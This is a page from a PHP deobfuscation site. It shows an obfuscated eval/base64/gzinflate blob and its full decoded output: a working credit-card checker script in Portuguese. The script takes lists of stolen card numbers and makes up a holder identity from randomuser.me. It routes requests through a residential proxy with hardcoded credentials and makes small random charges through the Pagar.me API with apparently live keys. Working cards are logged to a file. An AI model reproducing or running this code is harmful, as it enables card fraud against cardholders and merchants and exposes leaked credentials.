Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval(str_rot13(gzinflate(str_rot13(base64_decode('5UrdReM2FL7PRnW8GZzMmNgOG8rw11pFJ..

Decoded Output download

error_reporting(0);
set_time_limit(0);
function getStr($string,$start,$end){
  $str = explode($start,$string);
  $str = explode($end,$str[1]);
  return $str[0];
}

$lista = $_GET['lista'];
$separa = explode('|',$lista);
$cc = trim($separa[0]);
$mes = trim($separa[1]);
$ano = trim($separa[2]);
$cvv = trim($separa[3]);
///Final metodo Get
//if($mes <> "10" && $mes <> "11" && $mes <> "12"){
//$mes = substr($mes, 1,1);
//}
If(strlen($ano) > 2)
{
$ano = substr($ano,2,2);
}

$cookie_file = tempnam(sys_get_temp_dir(), 'COOK');
$initConf = [
  CURLOPT_RETURNTRANSFER => true,
  CURLOPT_FOLLOWLOCATION => true,     
  CURLOPT_SSL_VERIFYPEER => false, 
  CURLOPT_SSL_VERIFYHOST => false,
  CURLOPT_COOKIEFILE     => $cookie_file,
  CURLOPT_USERAGENT     => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15'
];

$ch = curl_init();


$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://randomuser.me/api/?nat=us');
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); 
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); 
curl_setopt($ch, CURLOPT_HEADER, 1); 
$data = curl_exec($ch);


$firstname = getStr($data, '"first":"','"');
$lastname = getStr($data, '"last":"','"');
$email = getStr($data, '"email":"','"');
$street = getStr($data, '"street":"','"');
$phone = getStr($data, '"phone":"','"');
$zip = getStr($data, 'postcode":',',');
$state = getStr($data, '"state":"','"');
////////PAGAR.ME KEY//////////////////////
//ek_live_uuUXkPHP05UhV6WjECHKB7LZlwXnxW
//ek_live_UNwRgwTnMBGgTzIroy5uLyLkwNS8PH
//ek_live_srfbBrRo8RPqRVNKDLy6haHdiR8KDh
//ek_live_srfbBrRo8RPqRVNKDLy6haHdiR8KDh
//ek_live_BX5OFQSamvasrE5N3sLm8VDY6yKsR2
//ek_live_BX5OFQSamvasrE5N3sLm8VDY6yKsR2 DEVERIA PSAR GG


$ch = curl_init(); 
curl_setopt($ch, CURLOPT_URL, 'https://api.pagar.me/1/cards');
curl_setopt($ch, CURLOPT_PROXY, 'http://zproxy.lum-superproxy.io:22225');
curl_setopt($ch, CURLOPT_PROXYUSERPWD, 'lum-customer-hl_61ed26e8-zone-static:Sasukedev');

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); 
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); 
curl_setopt($ch, CURLOPT_POSTFIELDS, 'payment_method=credit_card&card_holder_name='.$firstname.'&card_number='.$cc.'&card_expiration_date='.$mes.$ano.'&encryption_key=ek_live_srfbBrRo8RPqRVNKDLy6haHdiR8KDh');
$exec1 = curl_exec($ch);
$cardid = GetStr($exec1, '"id":"' ,'"');
if(strpos($exec1, '"valid":false')){
echo "<br><font color='#F01005' size='1'>@SH40L1N REPROVADO </font> -> $lista | $bin - [ VALIDAO ]</br>";     $hnd = fopen("die.txt", "a");
         fwrite($hnd,  "@edit reprovada    -> $lista $bin
");
  return;
}elseif(strpos($exec1, '403 Forbidden')){
echo "<br><font color='#F01005' size='1'>@SH40L1N REPROVADO </font> -> $lista | $bin - [ PROXY 00]</br>";       $hnd = fopen("die.txt", "a");
         fwrite($hnd,  "@edit reprovada    -> $lista $bin
");
  return;
}
$preco = mt_rand(100,500);

$ch = curl_init(); 
curl_setopt($ch, CURLOPT_URL, 'https://api.pagar.me/1/transactions');
curl_setopt($ch, CURLOPT_PROXY, 'http://zproxy.lum-superproxy.io:22225');
curl_setopt($ch, CURLOPT_PROXYUSERPWD, 'lum-customer-hl_61ed26e8-zone-static:Sasukedev');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); 
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); 
curl_setopt($ch, CURLOPT_POSTFIELDS, 'payment_method=credit_card&amount='.$preco.'&card_holder_name='.$firstname.'&card_id='.$cardid.'&encryption_key=ek_live_srfbBrRo8RPqRVNKDLy6haHdiR8KDh'); 
$exec = curl_exec($ch);
//403 Forbidden


//echo $exec;



include 'consultabin.php';

if(strpos($exec, '"status":"refused"')){
echo "<br><font color='#F01005' size='1'>@SH40L1N REPROVADO </font> -> $lista | $bin - [RECUSADO] &#13;&#10;</br>";       

$hnd = fopen("die.txt", "a");
         fwrite($hnd,  "@edit reprovada    -> $lista $bin
");
}elseif(strpos($exec, '403 Forbidden')){
echo "<br><font color='#F01005' size='1'>@SH40L1N REPROVADO </font> -> $lista | $bin - [ PROXY 01] ;</br>";       
$hnd = fopen("die.txt", "a");
         fwrite($hnd,  "@edit reprovada    -> $lista $bin
");

}elseif(strpos($exec, '"status":"authorized"')){
 echo "<br><font color='#00FF00' size='1'>@SH40L1N APROVADA  </font>$lista | $bin -> Autorizou R$: $preco</br>";
 
$hnd = fopen("PAGARME.txt", "a");
         fwrite($hnd,  "@SH40L1N APROVADA   -> $lista $bin
");
    
  
}else{
 echo "<br><font color='#F01005' size='1'>@SH40L1N REPROVADO </font> -> $lista | $bin - [ PROXY 03] ;</br>";
$hnd = fopen("die.txt", "a");
         fwrite($hnd,  "@edit reprovada    -> $lista $bin
");
}

Did this file decode correctly?

Original Code

<?php
eval(str_rot13(gzinflate(str_rot13(base64_decode('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')))));
?>

Function Calls

gzinflate 1
str_rot13 2
base64_decode 1

Variables

None

Stats

MD5 22c04ed58c552951c12210f0826fb4fa
Eval Count 1
Decode Time 99 ms